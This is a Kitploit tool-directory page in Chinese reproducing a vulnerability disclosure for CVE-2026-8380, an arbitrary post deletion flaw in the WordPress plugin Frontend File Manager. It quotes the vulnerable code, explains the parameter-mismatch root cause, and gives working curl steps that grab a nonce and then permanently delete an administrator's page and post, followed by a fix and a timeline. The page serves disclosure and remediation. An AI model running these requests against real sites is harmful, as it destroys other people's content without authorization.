Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-8380 — CVE-2026-8380 | Kitploit
工具/GitHubGitHub/tiagob0b/cve-2026-8380
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubtiagob0b/cve-2026-8380

CVE-2026-8380

CVE-2026-8380

查看仓库
2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-8380

CVE-2026-8380 — Frontend File Manager <= 23.6 任意文章删除

概述

在 WordPress 插件 Frontend File Manager (nmedia-user-file-uploader) 中发现了一个严重的授权缺陷,影响版本 <= 23.6。

由于 AJAX 删除端点中的授权验证不当,该漏洞允许低权限的已认证用户永久删除任意 WordPress 文章、页面、附件和自定义文章类型。

当插件选项 _allow_guest_upload=yes 启用时,未认证攻击者也可利用该漏洞。

  • CVE: CVE-2026-8380
  • 插件: Frontend File Manager (nmedia-user-file-uploader)
  • 受影响版本: <= 23.6
  • 研究人员: Tiago Ferreira
  • CWE: CWE-639 / CWE-862
  • 漏洞类型: 任意文章删除
  • WPScan: https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

执行摘要

该插件包含一个严重的授权绕过漏洞,可通过 wpfm_delete_file AJAX 操作中的参数不匹配校验,实现 WordPress 内容的任意删除。

该漏洞已在受控实验室环境中成功验证,并完成了主动的概念验证(PoC)利用。

研究过程中还发现了其他安全弱点:

  • 元数据更新端点中缺少 nonce 校验的 CSRF
  • 仅根据最后一个文件扩展名即可绕过扩展名白名单
  • _allow_guest_upload 在多个端点中禁用授权检查
  • 仅基于 REMOTE_ADDR 进行速率限制

受影响端点

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=wpfm_delete_file

受影响文件

root@kitploit:~
inc/files.php

漏洞代码区域

root@kitploit:~
// inc/files.php:691
if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {
    wp_send_json_error(__("Sorry, not allowed", "wpfm"));
}

// inc/files.php:695
$file_ids = isset($_POST['file_ids']) && is_array($_POST['file_ids'])
            ? array_map('intval', $_POST['file_ids']) : [];

foreach ($file_ids as $file_id) {
    $file = new WPFM_File($file_id);

    wp_delete_post($file_id, $bypass_trash);
}

根本原因

授权检查使用单数参数验证所有权:

root@kitploit:~
$_POST['file_id']

然而,实际的删除操作遍历的是另一个参数:

root@kitploit:~
$_POST['file_ids[]']

由于这种不匹配,攻击者可以:

  1. 在 file_id 中提供一个合法拥有的文章
  2. 将任意受害者文章 ID 注入 file_ids[]

不存在任何验证来确保:

  • file_ids[] 中每个条目的所有权
  • 允许的 post_type
  • file_id 与 file_ids[] 之间的关系

因此,任意 WordPress 内容都可能被永久删除。


影响

拥有最低权限的已认证用户可以永久删除:

  • 文章
  • 页面
  • 产品
  • 附件
  • 自定义文章类型
  • 插件特定内容

删除操作通过以下代码执行:

root@kitploit:~
wp_delete_post($file_id, true);

这意味着内容将被永久删除,无法从回收站恢复。

如果启用了 _allow_guest_upload=yes:

  • 无需认证即可利用
  • 作者所有权检查被完全跳过

概念验证(PoC)

实验室环境

  • 目标:192.168.1.1:8080
  • 攻击者角色:订阅者(Subscriber)
  • 受害者角色:管理员(Administrator)

攻击者账户

root@kitploit:~
wpfm_sub : Sub@Test123

受害者文章

root@kitploit:~
Page ID: 60
Post ID: 61

步骤 1 — 获取 Nonce

攻击者访问包含以下短代码的页面:

root@kitploit:~
[ffmwp]

提取 nonce:

root@kitploit:~
curl -b sub_cookie http://target/wpfm-test/ | grep wpfm_ajax_nonce

响应:

root@kitploit:~
value="9c233d4720"

步骤 2 — 触发任意删除

root@kitploit:~
curl -b sub_cookie -X POST http://target/wp-admin/admin-ajax.php \
    --data 'action=wpfm_delete_file' \
    --data 'wpfm_ajax_nonce=9c233d4720' \
    --data 'file_id=57' \
    --data 'file_ids[]=60' \
    --data 'file_ids[]=61'

说明

参数说明
file_id=57订阅者拥有的文章,用于绕过授权
file_ids[]=60受害者管理员页面
file_ids[]=61受害者管理员文章

成功响应

root@kitploit:~
{
  "success": true,
  "data": {
    "message": "2 files, directories are removed inside SUB-OWNED"
  }
}

验证

root@kitploit:~
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/pages/60
root@kitploit:~
404
root@kitploit:~
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/posts/61
root@kitploit:~
404

严重性

已认证场景

CVSS 3.1

root@kitploit:~
8.1 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

启用访客上传场景

CVSS 3.1

root@kitploit:~
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CWE 分类

  • CWE-639 — 通过用户控制的密钥绕过授权
  • CWE-862 — 缺少授权

修复建议

验证 file_ids[] 中每个条目的所有权和文章类型。

安全实现示例:

root@kitploit:~
foreach ($file_ids as $fid) {

    if ( ! wpfm_is_current_user_post_author($fid) ) {
        wp_send_json_error(...);
    }

    if ( get_post_type($fid) !== 'wpfm-files' ) {
        wp_send_json_error(...);
    }
}

时间线

事件日期
发现漏洞2026-05-28
联系厂商2026-05-28
WPScan 发布2026-06-04
公开披露2026-06-18

参考资料

  • WPScan 公告: https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-8380


免责声明

本研究仅在受控实验室环境中进行,仅供教育和安全研究之用。

未经适当授权,请勿对系统进行测试。

下载工具